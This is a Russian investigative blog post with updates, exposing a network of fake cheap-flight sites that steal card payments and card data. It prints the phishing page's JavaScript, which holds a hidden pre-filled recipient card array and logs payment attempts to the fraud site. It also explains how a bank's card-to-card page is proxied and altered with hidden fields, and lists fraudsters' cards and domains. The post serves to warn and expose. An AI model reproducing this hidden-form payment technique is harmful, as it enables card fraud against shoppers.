Дешевые авиабилеты… Или сеть мошеннических сайтов, ворующих деньги с карт. Мое расследование

В этой публикации речь пойдет о целой сети мошеннических сайтов, которые на протяжении долгого времени работают с единственной целью — похитить данные банковских карт и увести все доступные денежные средства с этих карт. В этой схеме используются на разных этапах сервисы известных компаний и банков. Таких как Яндекс (Поиск, Директ, YandexMoney, Карты), Промсвязьбанк, Банк Тинькофф и, вероятно, других.



История эта началась совсем недавно. Всего пять дней назад и, можно сказать, что пока еще не закончилась. Один мой знакомый обратился ко мне за консультацией с вопросом, можно ли как-нибудь закрыть «нехороший сайт»…

Итак, что же случилось?

Мой знакомый захотел купить авиабилеты и решил, что самый простой для этого способ — задать вопрос Яндексу. На простой запрос типа «самые дешевые билеты в Анапу» Яндекс одну из первых ссылок выдал на некий сайт, который служит для поиска и покупки дешевых билетов без комиссии. Ссылка эта, вероятно, была в верхнем рекламном блоке. Перейдя по ссылке, мой знакомый нашел себе подходящие билеты, оформил заказ, и попал на страницу оплаты с помощью банковской карты…

Сайт этот для среднего человека, если не вдаваться в детали, может оказаться совершенно обычным сайтом по поиску билетов и не вызвать подозрений. Домен _aviapromo.eu_

Вот так выглядит главная страница. Скриншот сохранился только с телефона.



Это поиск билетов:



Заказ оформлен:



Это страница оплаты:


На картинках мой пробный заказ, который я делал, чтобы разобраться, как работает этот сайт.

Мой знакомый оплатил билеты. При оплате по смс приходили коды подтверждения 3d Secure, которые, как это бывает обычно, нужно было вводить в браузере на соответствующей странице. Получив на почту «маршрутные квитанции» и считая, что билеты куплены, мой знакомый пошел заниматься своими делами.

На следующий день на телефон стали приходить «непонятные смс». Сначала пришла смс на списание с суммой в 2 рубля, и в ту же минуту эти 2 рубля вернули на карту с примечанием «отмена покупки». Еще через 2 часа непонятное списание и возврат 2 рублей повторились. И еще через минуту началось что-то невероятное. С карты списали 17700руб. Еще через 10 минут списали дополнительно 17700руб. Еще через 10 минут пытались списать 11800руб. Последняя операция не прошла только из-за того, что на карте кончились деньги. Я думаю, что если бы на карте был бы больший остаток, то списания бы продолжались каждые 10 минут до тех пор, пока не пришел бы отказ. История описываемых операций хорошо видна на заглавной фотографии — это скриншот смс'ок от Сбербанка, приходящих на телефон.

В момент первой «непонятной смс про 2 рубля», хоть это и показалось подозрительным, карта не была заблокирована. Все последующие списания были выполнены в течение 20-30 минут. Мой знакомый в это время был в общественном транспорте. Пытался дозвониться в Сбербанк для блокировки карты. Но как это обычно бывает, банк предлагал понажимать кнопочки в голосовом меню, а затем подождать в очереди. Быстро заблокировать карту через кол-центр банка не получилось. А приложение на смартфоне, через которое тоже можно было бы заблокировать карту, не было установлено. Карту потом заблокировали, но было уже поздно — деньги утекли. На следующий день мой знакомый написал заявление в сбербанк. На данный момент заявление находится на стадии рассмотрения. Карту перевыпустили.

Еще через два дня, уже когда карта была заблокирована, была попытка списать с карты 11800р, а еще через день новая попытка списать еще 23600руб. Т.е. это еще раз подтверждает, что тормозов у мошенников не было.



И на десерт, ко всем этим неожиданным списания, выяснилось, что никакой брони в авиакомпании нет и не было. Т.е. авиабилеты не были забронированы. Все было обманом и деньги ушли в неизвестном направлении.

В результате с карты украли (потери за оплаченные билеты и последующие списания) в общей сумме составили 47 377рублей. А могло бы быть гораздо больше.

Теперь попробуем разобраться, что же на самом деле произошло и где можно было обнаружить подвох.

1. Домен в зоне EU должен был по крайней мере насторожить.

2. Кроме поиска авиабилетов на сайте было всего несколько страниц, цель которых пустить пыль в глаза.

3. Если копнуть глубже, то указанный на странице ОГРН компании принадлежал компании, которая была закрыта в 2011 году. А само название компании в выписке ЕГРЮЛ и на сайте не совпадает, на сайте частично изменено. Проверить данные по ОГРН, ИНН и названию юридических лиц можно в базе налоговой инспекции egrul.nalog.ru.

4. Рейтинги сайта ТиЦ и PR нулевые (это видно в тех редких случаев, когда в браузере установлена панель вебмастера или что-то похожее).

5. Основное, что должно было насторожить. Должна была быть оплата без комиссии, как указано на сайте, 5900 за каждый авиабилет, а в смс от банка пришло назначение «Списание 5900.00 P2P PSBANK», а после оплаты этих 5900, приходила смс о том, что списано 5988,50р. Что такое «P2P» конечно знают не все. Можно было бы поискать. «P2P» — это сервис перевода с карты на карту. А сумма списания больше, чем сумма платежа, потому что банк, через который производился платеж, берет за это комиссию. Т.е. реально деньги, которые якобы оплачивались за авиабилеты, переводились на чью-то банковскую карту через сервис PSBANKa (Промсвязьбанк). При этом покупателю банк присылал проверочный код 3D Secure, который покупатель, ничего не подозревая, вводил в браузере.

6. Если с переводом на карту для меня понятно, что владельца карты ввели в заблуждение, чтобы он сам ввел код 3D Secure, то с последующими списаниями без проверки 3D Secure, для меня ситуация не совсем понятна. Я ни разу не сталкивался с ситуацией, чтобы Сбербанк в интернете позволял что-то оплатить без проверки 3D Secure (без подтверждения через SMS). Единственный исключение, когда смс не запрашивается, — это когда операции производятся через мобильное приложение СбербанкОнлайн на телефоне. Но телефон похищен не был и данные от личного кабинета похищены не были. Очевидно, что были получены только данные банковской карты моего знакомого. И, имея только данные карты, деньги списывались при использовании сервиса YM (Yandex.Money) в пользу Yandex.Direct (рекламная сеть Яндекса). Здесь есть явно какая-то недоработка в системе безопасности и возникает вопрос либо к Сбербанку, либо к Яндексу, как они такое позволяют делать.

В результате складывается примерно такая картина работы мошеннического сайта:

Сайт через рекламу в Яндекс.Директ привлекает посетителей. Без рекламы таким сайтам выбраться в топ выдачи практически нереально. Выглядит сайт в чем-то похожим на нормальные сайты. Поиск рейсов и свободных мест работает отлично. Для этого сайт принимает запрос посетителя, просит его подождать, сам отправляет запрос на какой-то другой сайт, на котором есть реальные данные по авиабилетам, из полученного ответа вырезается лишнее и подготовленная информация выдается на своей странице. Вполне возможно, что и цены немного корректируются (цены я не проверял). Дальше посетитель оформляет заказ, вводя свои данные. Ввод данных выглядит также, как и на многих других сайтах по продаже билетов. После ввода данных и подтверждения заказа, покупателю сообщают код заказа и дают 24 часа на оплату. При оплате оригинальная страница одного из банков с сервисом перевода P2P переделывается определенным образом (об этом ниже) и встраивается на мошеннический сайт. «Покупатель» авиабилетов, если не заметит подвох, переводит деньги на какую-то чужую банковскую карту. При этом данные банковской карты «покупателя» перехватываются и в дальнейшем используются для списаний — при этом пополняется счет какого-то аккаунта в Яндекс.Директ для последующей рекламы и поиска новых жертв. Дальше все тоже самое по кругу.

После всей этой истории было написано заявление в полицию (на рассмотрении), в сбербанк (на рассмотрении), в Яндекс, хостинг-провайдеру и др.

Мошеннический сайт размещался на хостинге FirstVDS. По моему заявлению с подробным описанием аккаунт мошеннического сайта заблокировали. Правда, через полдня опять разблокировали. Но по повторному заявлению опять заблокировали (надеюсь, уже навсегда), сославшись на то, что разные отделы провайдера не разобрались. Конечно, это не полная блокировка — мошенники могут поменять хостинг.

Одержав хоть маленькую и временную, но победу с закрытием сайта, нужно было решать вопрос с авиабилетами. И какого же было удивление, когда по аналогичному поисковому запросу Яндекс на первой строчке рекламного блока выдал другой сайт, который имел слегка измененный дизайн, но имел практически тот же функционал и похожий движок. Его цель — обман посетителей, кража денег и данных кредитных карт. Т.е. после того, как один сайт задушен, тут же появляется новый сайт (точнее он и раньше работал, просто в рекламе поднимаются не все сразу). Адрес другого сайта, по «якобы продаже авиабилетов» — _avia-scanners.ru_. Если представители Яндекса захотят проверить, то вот полная ссылка из Яндекс.Директа (в которой есть идентификатор рекламодателя.

_http://avia-scanners.ru/?utm_source=yandex&utm_medium=cpc&utm_campaign=21628812&utm_content=2877643372&utm_term=%D0%B0%D0%B2%D0%B8%D0%B0%D0%B1%D0%B8%D0%BB%D0%B5%D1%82%D1%8B%20%D0%BF%D0%BE%20%D1%80%D0%BE%D1%81%D1%81%D0%B8%D0%B8%20%D0%B4%D0%B5%D1%88%D0%B5%D0%B2%D0%BE


То, что этот сайт мошеннический, видно сразу, даже не вникая в технические детали, — указанный ИНН не существует, указанный ОГРН не существует, указанное юридическое название — не существует, указанный почтовый адрес — не существует итп. ИНН вообще указан двенадцатизначный, что бывает только у ИП и физ.лиц.

На заглавной странице картинки, которые должны вести на страницы скачивания мобильных приложений (в AppStore, Google Play и магазине для Windows Phone). Но все эти картинки не содержат ссылок на мобильные приложения.



В этот раз было решено более детально разобрать, как же этот сайт вводит пользователей в заблуждение на странице оплаты. Технология оказалась несложная.

Это внешний вид страницы оплаты на сайте «поиска авиабилетов».



Посмотрим исходный код страницы. Видим подозрительные папки "...P2P..." с различными скриптами. В этих скриптах я не нашел ничего интересного, что могло бы быть связано с похищением средств. В основном там были скорее всего не модифицированные скрипты банка, про который речь пойдет ниже.

А вот канонический адрес страницы нам интересен. Мы здесь видим, что фактически страница сервиса банка Тинькова (_www.tinkoff.ru/cardtocard/_) почти полностью включена в мошеннический сайт. Причем здесь используется не окно iframe. Здесь именно при использовании промежуточной обработки на сервере хостинг-провайдера страница скачивается с сайта Тинькова, потом на сервере модифицируется и почти полностью с небольшими «бонусами» выкладывается.



Мое предположение было, что в HTML коде должен быть скрытый блок DIV, скрытая форма или что-нибудь похожее. А скорее всего несколько таких скрытых блоков. И предположение подтвердилось. Нажимаем в браузере F12 (средства для веб-разработки). Находим нужный нам скрытый блок. Видим в колонке справа его свойство display:none



Щелкаем по чекбоксу, чтобы отключить свойство display:none и… Тайное становится явным.
Мы видим предзаполненную форму с номером чужой кредитной карты, на которую должны уйти наши деньги.



А вот так выглядит оригинальная страница банка Тинькова. Правда похоже? Т.е. что происходит? Форма частично заполняется. Из этой формы скрывается все лишнее (блок с картой получателя), часть какая-то может быть даже не скрывается, а вырезается на сервере. И эта страница в измененном виде подсовывается посетителям сайта, в надежде, что они ничего не заподозрят.



И на десерт вот исходный html код с предзаполненным номером банковской карты получателя.



И вот еще интересный кусок кода.



Этот же кусок со скриптом в текстовом виде ниже:

Давайте попробуем разобраться, что в коде происходит.

В коде задан массив с номерами карт получателей. Эти номера скриптом подставляются в форму оплаты. Теоретически может быть семь разных карт получателя и при каждой неудачной попытке оплаты номер карты должен меняться. Но, вместо семи разных номеров, задан один и тот же номер несколько раз. Т.е. при неудачной попытке следующая попытка будет с тем же самым номером карты получателя.

И для того, чтобы был порядок, при каждой попытке оплаты данные передаются на страницу на этом мошенническом сайте, которая все записывает для бухгалтерии. Вечером, вероятно, придет «бухгалтер» и проверит записи в журнале.
$("#card_number").on('blur', function () {
    $("#transfer__card_number").change();
});

function refr() {
    $("#transfer__card_number").change();
}

popitka = 0;
function addpay(title, status) {

    var newcards = [
        '5106 2160 0313 4297',
        '5106 2160 0313 4297',
        '5106 2160 0313 4297',
        '5106 2160 0313 4297',
        '5106 2160 0313 4297',
        '5106 2160 0313 4297',
        '5106 2160 0313 4297',
    ];
    if (status == 0) {
        $('#card_number2').val(newcards[popitka]);
        $('#card_number2').change();
        popitka = popitka + 1;
    }

    $.ajax({
        url: 'http://avia-scanners.ru/addpay.php?sum=' + 3272 + '&status=' + status + '&title=' + title + '&code=lyyPt',
        success: function () {
            xhr.abort();
        }
    });
}

$(document).ready(function () {
    $("#card_number2").keyup();
    $('#card_number2').change();
});
При каждом посещении страницы оплаты (Можно, например, разными браузерами попробовать), в поле получателя платежа подставляется новый номер карты. Вот номера карт, на которые мошенники выводили деньги, крадя их у посетителей сайта по продаже авиабилетов. Этих карт точно намного больше. Привожу номера на случай, если кто-нибудь заинтересуется статьей и захочет провести проверку…

5106 2160 0313 4297
5106 2160 0408 7015
5106 2160 0310 8804

Что в этих картах сходного? Правильно, начальные цифры 5106 21…

Попробуем поискать по базе BIN номеров банков.
Вот такой интересный результат получается:
Issuing Bank: YANDEX MONEY NBCI.LLC
Card Type: MASTERCARD

Случайным образом мошенники используют рекламу от Яндекса (Яндекс.Директ), Сервис перевода денег Yandex.Money и дополнительно через сторонние банки выводят средства на банковские карты, выпущенные Яндексом. Абсолютно точно Яндекс в этих махинациях никак не замешан, но Яндекс мог бы сильно помочь в уменьшении количества мошеннических операций. Возможно для этого какие-то правила или регламенты нужно изменить. Письма в Яндекс я тоже писал. Информацию они приняли, как распорядятся ей, я не знаю. Помочь с блокировкой средств они мне не смогли, но написали, «По Вашему запросу мы провели расследование и приняли все необходимые меры...» Что меня приятно удивило в службе поддержки Яндекса, касающейся мошеннических операций, — в полтретьего ночи пишешь им письмо — через 10-15 минут приходит ответ живого человека.

Судя по сообщениям, которые я нашел в интернете, эти сайты работают давно и количество пострадавших немаленькое. А по прикидкам, пострадавших может быть довольно много. В интернете есть сообщения о пострадавших и годичной давности, а есть сообщения, размещенные пять дней назад, об оплаченных авиабилетах на мошенническом сайте, про который я в первой половине написал.

Но и это еще не все. На многих мошеннических сайтах по продаже авиабилетов есть одна общая черта, однозначно объединяющая их и указывая, что они относятся к одной группе. Здесь не буду писать, что это за особенность, чтобы не помогать злоумышленникам. Но вот только некоторые мошеннические сайты из этой группы найденные за несколько минут: _avialex.ru_, _avia-kassa.ru.com_, _flyseven.ru_, _aviasalesdirectly.ru_, _avia-run.ru_, _aviasalle.com_.

Часть из этих сайтов уже заблокирована и находится в черных списках на разных отзовиках. Последний сайт в списке сейчас прикинулся зайчиком. Это был очередной сайт, который ждал своего звездного часа. Он тоже расположен на хостинге FirstVDS. Сайт временно отключил мошеннический функционал, после того, как я и его попросил заблокировать. Поэтому пока его не заблокировали.

Т.е. мы видим, что это не разовая поделка. Мошенники годами используют отработанную схему. Используются домены в разных зонах, разные хостинги, сервисы разных банков для переводов с карты на карту (кроме Тинькова и Промсвязьбанка могут быть и другие), вывод денег производится на большое количество карт. Если только с одной карты можно легко угнать 47 тр, то какие могут быть в общем объеме вороваться суммы?

Со своей стороны я разных писем и заявлений много написал. Но всю сеть победить одному человеку затруднительно, если только не положить на это 100% своего времени.

Главное, будьте бдительны при оплате авиабилетов на незнакомых сайтах и тогда и мошенникам будет сложнее.

UDP.
Про _avia-scanners.ru_ я заявления провайдеру не писал (хостинг у этого сайта sprinthost.ru — отличается от первого). Этот сайт оставил для того, чтобы читатели публикации смогли его препарировать и разобрать. Сейчас этот сайт уже не работает.

Кто-то из читателей успел поиграть с ним. Но сейчас он не доступен. На главной странице «Forbidden/ You don't have permission to access / on this server. Apache/2.4.17 Server at avia-scanners.ru Port 80»



Почему _avia-scanners.ru_ стал недоступен, точной информации нет. Может не выдержал нагрузки, может представитель провайдера прочитал статью и закрыл сайт, может представители банка ТКС или Сбербанка прочитали статью и написал провайдеру, может Яндекс как-то посодействовал, может кто-то из представителей правоохранительных органов, а может админ этого сайта, завсегдатай geektimes и, прочитав статью, осознал что был не прав, и решил встать на путь исправления.

В любом случае Ваша активность помогла закрыть еще один фишинговый сайт. Я надеюсь, что это спасет кого-нибудь из потенциальных покупателей авиабилетов, от попадания в неприятную историю

UDP2 (27.09.2016)
Как я писал, количество сайтов может быть очень большим. Спасибо пользователю triton, он в комментариях указал еще три новых точно таких же мошеннических сайта _flying-avia.ru_, _scanner-ticket.ru_, _scanner-aero.ru_. Я уверен, что есть или появятся в ближайшее время и другие сайты. В нижней части этой публикации размещу сводную таблицу. Если кто-то еще найдет подобные сайты, готов добавить информацию о них в эту таблицу.

Пока три найденных новых сайта работают и те, кто не успел препарировать предыдущие сайты до того, как их закрыли, может сделать это сейчас. Эти новые три сайта работают практически одинаково, по той же самой схеме, что и разобранный в статье _avia-scanners.ru_. Минимальное изменение дизайна, минимальное изменение контактных данных. Мелочи типа девятизначного ИНН не принимаются в расчет. Используется тот же самый сервис банка Тинькова, что очень хорошо видно на скриншотах.

Публикация получилась длинной. Поэтому часть новых скриншотов буду убирать под спойлер.

Скриншоты заглавных страниц четырех новых сайтов. Да, это не один сайт
_scanner-ticket.ru_


_flying-avia.ru_


_scanner-aero.ru_


_aviasalle.com_


Страницы оплаты на новых сайтах. Тот же сервис P2P от банка ТКС
_flying-avia.ru_, так как ее видит пользователь


_flying-avia.ru_, если скрытые элементы показать. Здесь я кроме карты открыл еще скрытое поле «сумма».


_scanner-ticket.ru_, если показать скрытые элементы


_scanner-aero.ru_, если показать скрытые элементы



На новых трех сайтах обнаружены следующие номера кредитных карт, на которые мошенники выводят средства:
5106 2160 0451 0834 получена на _flying-avia.ru_
5106 2160 0909 7977 получена на_scanner-ticket.ru_
5106 2160 0451 0834 получена на_scanner-aero.ru_

Два из трех указанных сайтов, предлагают выводить средства на одну и ту же карту. Причем эти два сайта, хоть и расположены у одного хостинг-провайдера, но работают на разных IP (см. таблицу внизу). И опять новые карты выпущены Яндекс.Банком.

Дополнительно на новых сайтах при оплате предлагается на выбор два способа оплаты. Первый — картами, второй через терминалы. На первых описываемых сайтах, если я ничего не пропустил, не было возможности оплатить «авиабилеты» через терминал. Давайте посмотрим, как же происходит оплата через терминал. На сайтах выложена подробная инструкция «как оплатить через терминал» Инструкция длинная, размещена под спойлером. В этой инструкции вообще хитростей нет. Невнимательным покупателям предлагается просто прийти к терминалу и положить деньги на чей-то QIWI кошелек. Номер телефона кошелька в инструкции указан.
Оплата авиабилетов через терминал. Инструкция на сайте _scanner-ticket_ru


Мошеннические сайты по продаже авиабилетов
_avialex.ru_ Архивный
_avia-kassa.ru.com_ Архивный
_flyseven.ru_ Архивный
_aviasalesdirectly.ru_ Архивный
_avia-run.ru_ Архивный
_aviasalle.com_ Провайдер FirstVDS Пока работает, после заявления скрыл мошеннический функционал
_aviapromo.eu_ Провайдер FirstVDS Заблокирован провайдером 22.09.2016
_avia-scanners.ru_ Провайдер Sprinthost, IP 141.8.195.50 Перестал работать после статьи на geektimes 26.09.2016
_flying-avia.ru_ Провайдер Sprinthost, IP 141.8.195.50 Заблокирован провайдером 27.09.2016 после прочтения статьи на geektimes
_scanner-ticket.ru_ Провайдер Sprinthost, IP 141.8.195.50 Заблокирован провайдером 27.09.2016 после прочтения статьи на geektimes
_scanner-aero.ru_ Провайдер Sprinthost, IP 141.8.195.138 Заблокирован провайдером 27.09.2016 после прочтения статьи на geektimes
_scaner-avia.ru_ Провайдер Sprinthost, IP 141.8.195.138 Заблокирован провайдером 27.09.2016 после прочтения статьи на geektimes
_pilotavia.ru_ Провайдер TheFirst-RU clients (WebDC Msk), IP 188.120.250.184 Был как две капли похож на _aviapromo.eu_ После упоминания в статье на geektimes по состоянию на 28.09.2016 отображается сообщение — «Сайт временно отключен»
_letofly.biz_   Пока доступен. Был как две капли похож на _aviapromo.eu_, после упоминания на geektimes 29.09.2016 быстро сменил внешний вид, убрав мошеннический функционал. На сайте указано, что домен якобы выставлен на продажу. При этом в элементах нового дизайна используются логотипы и название немошеннического сайта
_avia.netprosolution.co_   РАБОТАЕТ, крадет деньги и данные карт, сильно но не полностью похож на _aviapromo.eu_.

Примечание по списку сайтов в таблице. Когда я начал составлять эту таблицу, я подозревал, что подобных сайтов много, но не подозревал, сколько именно. Простой поиск в поисковых системах дает ссылки на как минимум на пару десятков подобных сайтов. Некоторые из них еще есть в поисковиках, но уже недоступны (можно посмотреть только закешированную версию). Список ранее действовавших подобных сайтов, но уже заблокированных составляет более 400шт. Поэтому с Вашего позволения, я эту таблицу больше не буду дополнять, за исключением каких-либо особенных сайтов, разбор которых может быть интересен.

Вот для примера сотня заблокированных сайтов мошенников по продаже авиабилетов
_fly-4you.ru_
_economavia.ru_
_nticket.ru_
_red-avia.com_
_lykafe.ru_
_max-fly.ru_
_tourfly.biz_
_bilet-poisk.ru_
_masterfly.ru_
_future-fly.ru_
_tiptopair.ru_
_100bilet.ru_
_go-go-travel.com_
_point-avia.com_
_avianeo.ru_
_itarifyaviabilety.ru_
_eg-avia.ru_
_horoshoairbilety.ru_
_aviakassa-sales.ru_
_gogoavia.com_
_avia-toptickets.ru_
_poiskovik-airline.ru_
_ticket-online.ru_
_avia-fun.com_
_disavia.ru_
_expressaviabilet.ru_
_moi-avia.ru_
_онлайн-авиа.рф_
_slim-avia.org_
_fly-info.ru_
_aviakassaonline24.ru_
_bestavias.ru_
_oaviabiletychelny.ru_
_etoavia.ru_
_aviakassabiletov.ru_
_avia-online24.ru_
_onlinepolet.ru_
_tip-trip.biz_
_disaero.ru_
_ticket-planet.ru_
_flyglobal.ru_
_mainavia.ru_
_ticket2avia.ru_
_online-airlines.ru_
_super-avia.ru_
_fun-avia.com_
_avia-book.ru_
_poiskvnebo.ru_
_avia-world.ru_
_aviachild.ru_
_aviaonline.org_
_deshevoavia.ru_
_vnemli.ru_
_moifly.ru_
_экспресс-авиа.рф_
_grundfly.ru_
_airbiletyonline.ru_
_fast-fly.ru_
_zaaviabiletom.ru_
_splash-avia.com_
_bystro-aviabileti.ru_
_aviabulet.ru_
_xdavia.ru_
_mytripbonus.ru_
_broniruem-online.ru_
_newgoaaviabilety.ru_
_search-fly.ru_
_privat-air.org_
_biletnasamoletonline.ru_
_smilefly.ru_
_x-avia.ru_
_raido-rent.com_
_avia-rsexpress.ru_
_aviaspecmontag.ru_
_just-avia.ru_
_onlyavia.ru_
_letimairlanes.ru_
_avia-russia.ru_
_trip-avia.com_
_aviagold.ru_
_deshevo-poletet.ru_
_avia-kafe.ru_
_poisk-avia.ru_
_fly-land.ru_
_aviaup.ru_
_продажа-авиа.рф_
_airlines-travel.ru_
_cafe-avia.ru_
_avia-cloud.com_
_fly-corp.ru_
_eco-avia.com_
_ticket-aero24.ru_
_turscannerpro.ru_
_roomticket.ru_
_flyfiaryav.ru_
_express-avia.ru_
_broniruem24.ru_
_wow-avia.ru_
_sky-trips.ru_
_aviabin.ru_

Негативные отзывы, истории кражи денег при покупке билетов, черные списки можно найти на разных интернет-сайтах. При таком масштабе, в рамках этой статьи не имеет смысла в дежурном режиме обновлять таблицу. Масштаб действий мошенников на сайтах якобы продажи авиа (и иногда жд) билетов понятен. Когда есть один сайт, то мошенника вычислить и поймать не всегда возможно. Когда есть десятки и сотни сайтов, то, наверняка, мошенники не могут работать так, чтобы не оставалось следов. Или у провайдеров, или у банков, или у интернет-компаний, или у регистраторов доменов, или еще где-то должны оставаться следы. Поэтому если будет чьё-то волевое решение, то всю эту схему можно расследовать и найти ответственных за нее лиц.

UDP3:
Спасибо пользователю semb. В комментариях он указал еще на один сайт _pilotavia.ru_
Этот сайт примечателен тем, что он как две капли похож, на сайт _aviapromo.eu_ (на тот сайт, на котором герой этой статьи имел «неосторожность купить авиабилеты». Сайт этот продолжает работать. Это не просто похожий сайт, а такой же сайт, просто размещённый на другом хостинге и домене. Теперь есть возможность посмотреть подробнее, как сайт работает. Для тех, кто хочет поэкспериментировать, можно сразу начинать со ссылки _https://pilotavia.ru/?code=BX3FKT_ (Это ссылка с оформленным заказом, на которой есть возможность перейти к оплате. Времени на оплату дают 24 часа).
Заглавная страница, страница поиска рейсов и страница оплаты_pilotavia.ru_ такие же как у первого в статье сайта




На следующей странице в панели вебмастера по загрузке файлов видно, что реальные данные по наличию мест на рейсах получаются с нормального не мошеннического сайта aviacassa_ru. Текстовые данные, вероятно, корректируются на сервере, а ссылки на картинки остаются без изменений.


Тем, кто справшивал про https и детали сертификата. Появилась возможность проверить.
Сайт использует защищенное соединение и сертификат от Let's Encrypt. Интересная особенность, — сертификат выпущен сроком на три месяца. Это, наверное, для экономии? Реально оценивают срок жизни такого сайта.



Еще одна деталь. Сайт использует сервис Webvisor от Яндекса. Видно по запросам в нижней части панели на картинке ниже. Для тех, кто не в курсе это очень удобный сервис для записи поведения пользователей на сайте. Потом можно смотреть что-то похожее на видео про то, что пользователи делали на сайте. Использование вебвизора означает несколько моментов. — Мошенник зарегистрировал сайт в Яндекс.Метрике имеет подробную статистику о действиях пользователей на его сайте. Возможно даже номера карт получаются из данных вебвизора, хотя скорее всего номера карт записываются программным путем на сайте. Оборотная сторона медали — у Яндекса хранится полностью запротоколированная история всех операций на фишинговом сайте. Т.е., теоретически, если к этой информации получат доступ правоохранительные органы (если это в принципе осуществимо), то можно полностью восстановить картину по каждому случаю мошенничества и понять объем мошеннических операций.



Теперь про сам механизм кражи денег _pilotavia.ru_, а значит и _aviapromo.eu_. Это сайты не используют страницу банка Тинькова. Поскольку кража денег, описываемая в этой статье, была осуществлена через P2P PSBANK (Промсвязьбанк), было предположение, что точно так же страница Промсвзяьбанка изменяется и подставляется пользователю. Но при анализе HTML кода страницы оплаты я не обнаружил, никаких частей страниц каких-либо банков, не используются встраиваемые окна iframe, вообще не используются скрипты, а сама страница очень простая и не похожа на страницу Промсвязьбанка.
<form class="b-card-feature-list clearfix" id="formPay" action="payp2p.php" method="post">
По сути это страница представляет собой только форму для ввода номера карты. При подтверждении формы обработка передается программе payp2p.php. Это программа может делать что угодно, но код ее нам недоступен, — код выполняется на стороне сервера. Вероятно, эта программа получает данные карты, а дальше программным путем на стороне сервера каким-то образом заполнят форму Промсвязьбанка, а у пользователя запрашивает код подтверждения 3D Secure. Данные карты естественно сохраняются и могут быть в дальнейшем использованы для дополнительных списаний на разных сайтах. Если кто-то более подробно сможет вычислить алгоритм работы этого сайта — буду благодарен. По заявлению в полицию начато расследование — любая информация, которая может раскрыть преступную схему, приветствуется.

UDP4 (27.09.2016): Информация, для тех, кто спрашивал.
На данный момент деньги не вернули ни по платежам, которые ушли на чужие карты, ни по платежам, которые ушли в Яндекс.Директ. (Про платежи в Яндекс.Директ в банк было подано заявление менее через за 24 часа после списаний). Официального ответа от Сбербанка нет (15 дней еще не прошло). Сегодня для следователя делали бумажную выписку в отделении Сбербанка. Суммы списаны. Про получателей платежей в выписке никакой дополнительной информации нет.

Фрагмент выписки

Полные выписки из Сбербанка под спойлером





UDP5 (30.09.2016). Пользователь Vad_R в личку прислал свою реальную историю «покупки авиабилетов», при которой у него четыре месяца назад с карты украли ~20500р. Этот случай добавляю в публикацию, чтобы показать какие ещё бывают «способы относительно честного отъема денег у населения». Описание и детали под спойлером.

Если коротко, то на первых этапах оформление выглядит очень красиво, а после ввода данных банковской карты, они просто отправляются мошенникам, которые даже не стали утруждать себя какой-либо маскировкой своих действий. В последнем сообщении, которые видит пользователь допущены как минимум три грамматические/орфографические ошибки. Вероятно, в этом случае работали двоечники…


После ввода данных карты деньги были выведены переводом на чью-то чужую карту через сервис MMBANKa (Банка Москвы). Деньги вернуть не удалось. Заявление в полицию было написано. Дело закрыто «из-за отсутствия события преступления»
Подробности этого случая
Сайт по продаже авиабилетов выглядит прилично.


Страница поиска рейсов


Страница заполнения данных пассажира


Страницы ввода данных банковской карты, к сожалению, нет.

А вот чем закончилось.


Карта была привязанной к кошельку в Яндекс.Деньгах. Вот выписка из личного кабинета Яндекс.Денег.


Ниже объяснение того, что произошло. Вот цитата из заявления потерпевшего, которое было подано в отдел полиции №1 «Алупкинский» УМВД России по г.Ялте
З А Я В Л Е Н И Е
Прошу провести проверку настоящего заявления по факту незаконного завладения принадлежащими мне денежными средствами (мошенничества) неизвестными мне лицами, которые используя сайт, предлагающий услуги по продаже авиа билетов, а именно _forair.ru_ присвоили сумму в размере 19967,45 руб
Я, 04 июня 2016 года при поиске подходящего по стоимости билета зашел на сайт _forair.ru_ Данный сайт был в выдаче платных рекламных объявлений Яндекс Директ. Меня интересовали 3 билета из Санкт-Петербурга в Симферополь, которые я приобретал для спортсменов – конников. 11 июня в г. Санкт-Петербурге пройдут соревнования по конному спорту, где будет участвовать команда спортсменов, представляющая Крым.
Заполнил страницу, на которой указал паспортные данные пассажиров и далее сайт перенаправил меня на страницу оплаты, на которой я ввел данные своей карты Яндекс-Деньги, включая номер карты, дату окончания действия и CVV 2 код. После оплаты суммы, в размере 19653,00 руб (данная сумма была указана к оплате) сайт выдал сообщение, что данные введены неправильно и я должен ожидать 14 дней возврата денег. (скриншот сообщения прилагаю)
Заподозрив неладное начал изучать отзывы о сайте _forair.ru_ в интернете и понял, что попал на сайт – мошенник. После чего я обратился в службу поддержки банка, где мне ответили, что не могут вернуть деньги и посоветовали заблокировать карту и обратиться в полицию. В настоящий момент карта уже заблокирована.

Цитата ответа Яндекс.Денег на электронное обращение потерпевшего № 2787878 (06.06.2016)
Мы провели расследование и приняли необходимые меры, однако, к сожалению, не смогли вернуть Ваш платёж.
...

Полиция фактически отказалась расследовать дело, сославшись на то, что Яндекс им не ответил. При этом ждали недолго. 05.06.2016 потерпевший подал заявление в полицию, 13.06.2016 получил отказ в возбуждении уголовного дня. За 8 дней отделение полиции должно было направить официальный запрос в Яндекс и получить ответ. Обратите внимание, что отделение полиции находится в Ялте. Если запрос был направлен не электронным образом, то это слишком короткий срок. Может полиции просто нужно было еще несколько дней подождать ответ от Яндекса? Как говориться, «На нет и суда нет». Полный текст ответа из полиции в картинках ниже. Фамилии и лишние данные были стерты.


===========================================================================


Если нужны подробности, обращайтесь к пользователю Vad_R

UDP6 (06.10.2016) Сбербанк на обращение потерпевшего от 20.09.2016 "ответил". Написали, что срок рассмотрения продлили дополнительно на 30 дней. Деньги на данный момент не вернулись.

UDP7 (19.10.2016) Деньги, которые были списаны за Яндекс.Директ, вернулись 12.10.2016 (17700р+17700р). Возврат произошел через 22 дня с момента подачи заявления в банк.
Деньги, которые ушли на чью-то карту ~5900р+5900р+комиссия на данный момент по состоянию на 13.11.2016 не вернулись.

Смс с подтверждением возврата.


UDP8 (13.11.2016)
Опубликована вторая часть публикации с продолжением: Дешевые авиабилеты… Сеть мошеннических сайтов, ворующих деньги с карт. Расследование-Часть2. При чём здесь Промсвязьбанк?

UDP9 (02.03.2017)
Написал новую статью, в некоторой степени имеющую отношение к этой публикации: Яндекс игнорирует проверку 3D Secure при оплате рекламы в Яндекс.Директ с помощью банковских карт.
Метки:
Поделиться публикацией
Реклама помогает поддерживать и развивать наши сервисы

Подробнее
Реклама
Комментарии 399
  • +1
    Сурово, однако. Думал все эти card2card не дают себя в фрейме открывать…
    • +10
      Вы хоть читали? Там фреймов нету, есть клиент-серверная прокладка.
      • +1
        Я так и не понял, зачем вообще что-то куда-то встраивать, если можно тупо украсть код и «на той стороне» всё отправить?
